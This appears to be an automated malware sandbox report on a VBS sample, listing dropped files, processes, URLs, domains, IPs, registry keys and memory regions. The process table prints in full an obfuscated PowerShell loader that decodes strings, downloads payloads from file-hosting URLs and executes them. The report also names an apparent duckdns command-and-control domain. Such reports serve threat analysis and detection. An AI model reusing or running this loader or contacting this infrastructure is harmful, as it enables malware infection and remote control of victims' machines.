Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
file.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4po433uc.tt5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evqfq3lo.tlf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_snsziaf5.1x5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgxgobk3.rwg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Blanko.Pro
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function
Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223
-lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223,
$Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen
'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift
SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo
MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple
e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni-
N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat
e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul
,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye
Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere
Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun
Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes
(Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum
Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable
= Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor.
unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao
ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder
Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen
'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr
Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr
nsoSad.eg,nexhrDi.soaSyntamLandbm Flori .ovenQ.estgUnder)Massa ');$Chalybean=$Maalerudstyr[0];Nassedes (Jammerklagen 'Afgrn$MaartgWeen.lM,ddeo
Unhib F,ldaAntipl Komb:AtomiTM erer H,ckaperp n,mnumsP,shrc InseePapirn typid depoeAn corSlaveeSynchdPleace ReklsWalky= vacuNPerc,eSkarpw
Omsk-S.attOspyd,bFalskjunifoeSw.rmcKo,ultPrsid Arg,mSDecliyLavatsobligtPsecneAfvejmRed.o.Na.huNIntroeMargetLiged.DasypWk.ekie
.lamb njuCsubcrlBailoiYlvabeOsc en,rogetYappi ');Nassedes (Jammerklagen 'Uniso$GuardT WindrSphy aExotrnPleths yddcCiliceUdskrnArkivdShakseMewlsrHftigeTek.tdNon,peTh.las,hodo.
orayHAndreeAteetaFgtekdSpendeUnexprGeners peda[Holdu$RandpHVesteyJelabdGarvnrFu ktoKrongsGastia Re tlTillgtBi.ho2Bowli2 Ge
e3Kryb ]Advok= dame$Hill KKontoi owncrBaronkTydnieDa iegKnackaSkrifnMer eg ExogeSidst ');$Toksikologerne=Jammerklagen 'ex.crTSchizrCentra
,ragnBush,sRe.arcJgerseTilsvnMiratd Ok ueFertirPaeaneSkra,dFaitheUd iks W,re. hemaD.raktoJaz.bwReskonZorrol GospoPas.aaAu.cadVarmeF
Sem,i.noffl.inceeVil a(Canno$UnchaC SammhFarvaaUntatlAspa.y AntibBiv,aeReobla riftnSingi,organ$Doge,MMeds.eSrge,t.erruaK.bellHoldnt
ChidrGym,oaKra,va Gn wdOmfly)Aa en ';$Toksikologerne=$Lordswike[1]+$Toksikologerne;$Metaltraad=$Lordswike[0];Nassedes (Jammerklagen
'Suc e$GlairgBetjelIntrao .ilib Hyrea Un.rlAlm c:PartiJMinoreKnsf,naleneh Svi.aTurneaHeartrGe,neePathonForageKranssTugt,=S,rub(
ynocTSyba eHenresIndhotXipho- espiPMu,icaSndertMeta h,ucle trigo$BrevbM Blg eRelant RimeaWarfalmajust hmerInsenaScylla,pistdster.)Amora
');while (!$Jenhaarenes) {Nassedes (Jammerklagen 'Op,ld$T,nglgSyndelStelloJemadbDisseaSkoldl Afhu: PapiL nderaIndd n Flo dDefl.mWavenaHeternm.xitdComdasjan.tbsammeaTerpenAdjunkTootheTropsnMan.as
Udma= Stt,$It,tatC.nterRe,seuSpewie Sprj ') ;Nassedes $Toksikologerne;Nassedes (Jammerklagen 'IrakeSSammetMelanaStatsrt.iblt,emil-
SvedS Betrlforsre CucueDommepAnska M,se4 Syda ');Nassedes (Jammerklagen 'Volit$Ha,rbgNissil PlasoBond bImpanaCondilHobby:
CompJBeguneLocianToetah Sanda C.llaBrn,erdatabep ramnRealie i,cisXalos=Forla(EphesTDebutemiscosaffjet Resp-Mor.aPL guna SingtA,rinh
Prog Inval$VognmMUnp.oePolygt ContaUd,rnlSkil tFor,rrUncora Netva St,idEmbla)Amphi ') ;Nassedes (Jammerklagen ' .ent$FertigEnchalGteh,oSvartb,etalaSexollE.est:br.byH
Afseam.harmVindem,ynneo.nbric.risikUkvall ndeniCochakBossieUncou=Mampu$ T.psgPrer,lwill oTautibSulf.aUpb nlLiber:H.nneClegeghAdnera,btusyOffenrTuriso
Ag eoPoisot Indu+Skrt,+Stand%Drn e$ AltsM Uafha op.raNydenlFeltseFo.mirLymp,ustramdMargasVens,t IndryRollerFum r.Mar.ic onodoDruekuP.mprnSkrddtBourb
') ;$Chalybean=$Maalerudstyr[$Hammocklike];}$socialdemokratierne=340816;$glossina=29883;Nassedes (Jammerklagen 'Rumin$ draag,arzalnordyoVe.etbForhjaDecimlDgnbe:Au.piA
RevlnPaknitc,nsuiSatircMvre.iUd ispRhap.aS,gehnMisbrt.kseh Stil= Refl bundGEylhoeFe.ietMaane-FrimeCFad,roYamamn totttPar,ie
PerlnSubpattraci C,rer$FosteMAteete InextAltinaDuplilEngrotOmeg rNeomiaSkelsaKo,ladUnder ');Nassedes (Jammerklagen 'Prisk$BizengAnkyllCo,tooN
tiobSaccha ,thylLacci:RecurBO,iemaRhapsnEryngk atrokIntera AphrssyndesBostte Sik r W,theKvadrr Sh.m Meta= Micr Bewil[SjussS
Pally S lvsHemiltStatuest.ipm Stni.Qu veCSuperoRarebn BlvevCyngheAlarmrEnsmathvidv]Boble: Ko,r:ManuaFFulmirBes ioDe.olmNeelaBUnd,ra
OmphsinosieSpnd,6Docum4SerabSMrnent IntrrPsykoifo.ernFaldbgStr e(F.sil$dobb,AAr.henAstiatVerd,iKl.vecGalaci santpTransaStrubnVensktOmstn)Tandk
');Nassedes (Jammerklagen 'Grund$ AnabgKrt gl Gla.o BirtbMorala H ndlBrahm:Morg,RBrahmeIn.erg HulliJdisktNonoizPourpe Udsksel
es blksp=Nonvo Bilia[ ParmS Le.tyKernes SelvtSneryeFer,umraasa. Op aT Dugfe Hue,xPhytitNdven.,idacEPotionFlambc AdiaoCalildCentri
Titen Silkg.ntro]Skol : ragi:HalvaASloveS dsprCDrejeIVifteI Ideo.p nerGReconeTrinitRdnbbSEr,nttIntelr F rkiD stenEugeng M,ll(Keram$
Ce,tBFrasaa Kon nK,avikCirc,k Her aCan,sseftersProtoeLatisrOrangeSpe.crTromb)Hand. ');Nassedes (Jammerklagen 'Intro$SelvbgVirallVildnoOmskrb,hampa
LilllF,ake:basisfMyoelykroker ConfeMon ctLong sTrykl=depre$BlindRFlareeIronfgSuperiScelot Radiz Kreaescolds kyde. StotsNicaru
arkvbE ders Udf tNitterRovetiApplenPhrasgKonce(textu$SkeptsOmsa,oPlutec SceniOutmaa ottel.ndkbdSaloneAmphimMea.ioO.holkForrerGoos.a
spertFremmiIronie SagtrPh.lanAnkereM rcu,Appli$ PropgStartlBy ano AflysRud.isPoleriUtaknnOvergaLig.t)Org a ');Nassedes $fyrets;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function
Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223
-lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223,
$Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen
'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift
SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo
MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple
e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni-
N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat
e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul
,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye
Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere
Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun
Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes
(Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum
Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable
= Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor.
unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao
ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder
Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen
'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr
Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr
nsoSad.eg,nexhrDi.soaSyntamLandbm Flori .ovenQ.estgUnder)Massa ');$Chalybean=$Maalerudstyr[0];Nassedes (Jammerklagen 'Afgrn$MaartgWeen.lM,ddeo
Unhib F,ldaAntipl Komb:AtomiTM erer H,ckaperp n,mnumsP,shrc InseePapirn typid depoeAn corSlaveeSynchdPleace ReklsWalky= vacuNPerc,eSkarpw
Omsk-S.attOspyd,bFalskjunifoeSw.rmcKo,ultPrsid Arg,mSDecliyLavatsobligtPsecneAfvejmRed.o.Na.huNIntroeMargetLiged.DasypWk.ekie
.lamb njuCsubcrlBailoiYlvabeOsc en,rogetYappi ');Nassedes (Jammerklagen 'Uniso$GuardT WindrSphy aExotrnPleths yddcCiliceUdskrnArkivdShakseMewlsrHftigeTek.tdNon,peTh.las,hodo.
orayHAndreeAteetaFgtekdSpendeUnexprGeners peda[Holdu$RandpHVesteyJelabdGarvnrFu ktoKrongsGastia Re tlTillgtBi.ho2Bowli2 Ge
e3Kryb ]Advok= dame$Hill KKontoi owncrBaronkTydnieDa iegKnackaSkrifnMer eg ExogeSidst ');$Toksikologerne=Jammerklagen 'ex.crTSchizrCentra
,ragnBush,sRe.arcJgerseTilsvnMiratd Ok ueFertirPaeaneSkra,dFaitheUd iks W,re. hemaD.raktoJaz.bwReskonZorrol GospoPas.aaAu.cadVarmeF
Sem,i.noffl.inceeVil a(Canno$UnchaC SammhFarvaaUntatlAspa.y AntibBiv,aeReobla riftnSingi,organ$Doge,MMeds.eSrge,t.erruaK.bellHoldnt
ChidrGym,oaKra,va Gn wdOmfly)Aa en ';$Toksikologerne=$Lordswike[1]+$Toksikologerne;$Metaltraad=$Lordswike[0];Nassedes (Jammerklagen
'Suc e$GlairgBetjelIntrao .ilib Hyrea Un.rlAlm c:PartiJMinoreKnsf,naleneh Svi.aTurneaHeartrGe,neePathonForageKranssTugt,=S,rub(
ynocTSyba eHenresIndhotXipho- espiPMu,icaSndertMeta h,ucle trigo$BrevbM Blg eRelant RimeaWarfalmajust hmerInsenaScylla,pistdster.)Amora
');while (!$Jenhaarenes) {Nassedes (Jammerklagen 'Op,ld$T,nglgSyndelStelloJemadbDisseaSkoldl Afhu: PapiL nderaIndd n Flo dDefl.mWavenaHeternm.xitdComdasjan.tbsammeaTerpenAdjunkTootheTropsnMan.as
Udma= Stt,$It,tatC.nterRe,seuSpewie Sprj ') ;Nassedes $Toksikologerne;Nassedes (Jammerklagen 'IrakeSSammetMelanaStatsrt.iblt,emil-
SvedS Betrlforsre CucueDommepAnska M,se4 Syda ');Nassedes (Jammerklagen 'Volit$Ha,rbgNissil PlasoBond bImpanaCondilHobby:
CompJBeguneLocianToetah Sanda C.llaBrn,erdatabep ramnRealie i,cisXalos=Forla(EphesTDebutemiscosaffjet Resp-Mor.aPL guna SingtA,rinh
Prog Inval$VognmMUnp.oePolygt ContaUd,rnlSkil tFor,rrUncora Netva St,idEmbla)Amphi ') ;Nassedes (Jammerklagen ' .ent$FertigEnchalGteh,oSvartb,etalaSexollE.est:br.byH
Afseam.harmVindem,ynneo.nbric.risikUkvall ndeniCochakBossieUncou=Mampu$ T.psgPrer,lwill oTautibSulf.aUpb nlLiber:H.nneClegeghAdnera,btusyOffenrTuriso
Ag eoPoisot Indu+Skrt,+Stand%Drn e$ AltsM Uafha op.raNydenlFeltseFo.mirLymp,ustramdMargasVens,t IndryRollerFum r.Mar.ic onodoDruekuP.mprnSkrddtBourb
') ;$Chalybean=$Maalerudstyr[$Hammocklike];}$socialdemokratierne=340816;$glossina=29883;Nassedes (Jammerklagen 'Rumin$ draag,arzalnordyoVe.etbForhjaDecimlDgnbe:Au.piA
RevlnPaknitc,nsuiSatircMvre.iUd ispRhap.aS,gehnMisbrt.kseh Stil= Refl bundGEylhoeFe.ietMaane-FrimeCFad,roYamamn totttPar,ie
PerlnSubpattraci C,rer$FosteMAteete InextAltinaDuplilEngrotOmeg rNeomiaSkelsaKo,ladUnder ');Nassedes (Jammerklagen 'Prisk$BizengAnkyllCo,tooN
tiobSaccha ,thylLacci:RecurBO,iemaRhapsnEryngk atrokIntera AphrssyndesBostte Sik r W,theKvadrr Sh.m Meta= Micr Bewil[SjussS
Pally S lvsHemiltStatuest.ipm Stni.Qu veCSuperoRarebn BlvevCyngheAlarmrEnsmathvidv]Boble: Ko,r:ManuaFFulmirBes ioDe.olmNeelaBUnd,ra
OmphsinosieSpnd,6Docum4SerabSMrnent IntrrPsykoifo.ernFaldbgStr e(F.sil$dobb,AAr.henAstiatVerd,iKl.vecGalaci santpTransaStrubnVensktOmstn)Tandk
');Nassedes (Jammerklagen 'Grund$ AnabgKrt gl Gla.o BirtbMorala H ndlBrahm:Morg,RBrahmeIn.erg HulliJdisktNonoizPourpe Udsksel
es blksp=Nonvo Bilia[ ParmS Le.tyKernes SelvtSneryeFer,umraasa. Op aT Dugfe Hue,xPhytitNdven.,idacEPotionFlambc AdiaoCalildCentri
Titen Silkg.ntro]Skol : ragi:HalvaASloveS dsprCDrejeIVifteI Ideo.p nerGReconeTrinitRdnbbSEr,nttIntelr F rkiD stenEugeng M,ll(Keram$
Ce,tBFrasaa Kon nK,avikCirc,k Her aCan,sseftersProtoeLatisrOrangeSpe.crTromb)Hand. ');Nassedes (Jammerklagen 'Intro$SelvbgVirallVildnoOmskrb,hampa
LilllF,ake:basisfMyoelykroker ConfeMon ctLong sTrykl=depre$BlindRFlareeIronfgSuperiScelot Radiz Kreaescolds kyde. StotsNicaru
arkvbE ders Udf tNitterRovetiApplenPhrasgKonce(textu$SkeptsOmsa,oPlutec SceniOutmaa ottel.ndkbdSaloneAmphimMea.ioO.holkForrerGoos.a
spertFremmiIronie SagtrPh.lanAnkereM rcu,Appli$ PropgStartlBy ano AflysRud.isPoleriUtaknnOvergaLig.t)Org a ');Nassedes $fyrets;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
xwormmom53.duckdns.org
|
|
||
|
https://fs03n3.sendspace.com/dlpro/4b26f029f512f90f3568c85b6d26623d/664f6de9/ppxodm/Turde.jpb
|
unknown
|
||
|
http://fs03n3.sendspace.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://fs03n3.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/8gikly
|
172.67.170.105
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://fs13n3.sendspace.com/c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/ppxodmP
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://fs03n3.sendspaX
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://www.sendspace.com/FW
|
unknown
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://fs13n3.sendspace.com/dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC1
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/8giklyM
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
||
|
https://fs13n3.sendspace.com/
|
unknown
|
||
|
https://fs03n5.sendspace.com/dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb
|
69.31.136.17
|
||
|
https://www.sendspace.com/
|
unknown
|
||
|
https://fs13n3.sendspace.com/_i
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/ppxodm
|
172.67.170.105
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://fs13n3.sendspace.com/om:443
|
unknown
|
||
|
http://fs03n5.sendspace.com
|
unknown
|
||
|
https://fs03n5.sendspace.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://fs13n3.sendspace.com/dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin
|
69.31.136.57
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://fs13n3.sendspace.com/Di
|
unknown
|
||
|
https://fs13n3.sendspace.com/eh
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/ppxodmXR
|
unknown
|
There are 28 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
xwormmom53.duckdns.org
|
57.128.155.22
|
|
|
|
fs13n3.sendspace.com
|
69.31.136.57
|
||
|
fs03n3.sendspace.com
|
69.31.136.17
|
||
|
fs03n5.sendspace.com
|
69.31.136.17
|
||
|
www.sendspace.com
|
172.67.170.105
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
57.128.155.22
|
xwormmom53.duckdns.org
|
Belgium
|
|
|
|
69.31.136.17
|
fs03n3.sendspace.com
|
United States
|
||
|
172.67.170.105
|
www.sendspace.com
|
United States
|
||
|
69.31.136.57
|
fs13n3.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5827000
|
remote allocation
|
page execute and read and write
|
|
|
|
16CB53E2000
|
trusted library allocation
|
page read and write
|
|
|
|
8BB0000
|
direct allocation
|
page execute and read and write
|
|
|
|
5F08000
|
trusted library allocation
|
page read and write
|
|
|
|
A947000
|
direct allocation
|
page execute and read and write
|
|
|
|
226D1000
|
trusted library allocation
|
page read and write
|
|
|
|
7FFB4B380000
|
trusted library allocation
|
page read and write
|
||
|
24790000
|
trusted library allocation
|
page read and write
|
||
|
16CA5160000
|
heap
|
page read and write
|
||
|
7FFB4B310000
|
trusted library allocation
|
page read and write
|
||
|
3324000
|
trusted library allocation
|
page read and write
|
||
|
7850000
|
trusted library allocation
|
page read and write
|
||
|
225B8000
|
trusted library allocation
|
page read and write
|
||
|
2575E000
|
stack
|
page read and write
|
||
|
85B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
197C0ADF000
|
heap
|
page read and write
|
||
|
203970B0000
|
heap
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
7AFD000
|
stack
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
7891000
|
heap
|
page read and write
|
||
|
197C29EC000
|
heap
|
page read and write
|
||
|
197C0A82000
|
heap
|
page read and write
|
||
|
307E000
|
stack
|
page read and write
|
||
|
52EAA8B000
|
stack
|
page read and write
|
||
|
24976000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
197C0980000
|
heap
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
197C28C2000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
24B11000
|
heap
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B196000
|
trusted library allocation
|
page execute and read and write
|
||
|
2565E000
|
stack
|
page read and write
|
||
|
197C29C8000
|
heap
|
page read and write
|
||
|
C83000
|
trusted library allocation
|
page execute and read and write
|
||
|
16CA7129000
|
trusted library allocation
|
page read and write
|
||
|
197C29FA000
|
heap
|
page read and write
|
||
|
197C0AE3000
|
heap
|
page read and write
|
||
|
7FFB4B261000
|
trusted library allocation
|
page read and write
|
||
|
197C29EC000
|
heap
|
page read and write
|
||
|
22508000
|
stack
|
page read and write
|
||
|
197C28F1000
|
heap
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
C9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
8BA0000
|
trusted library allocation
|
page read and write
|
||
|
4BF8000
|
heap
|
page read and write
|
||
|
24710000
|
trusted library allocation
|
page read and write
|
||
|
25761000
|
trusted library allocation
|
page read and write
|
||
|
22773000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B160000
|
trusted library allocation
|
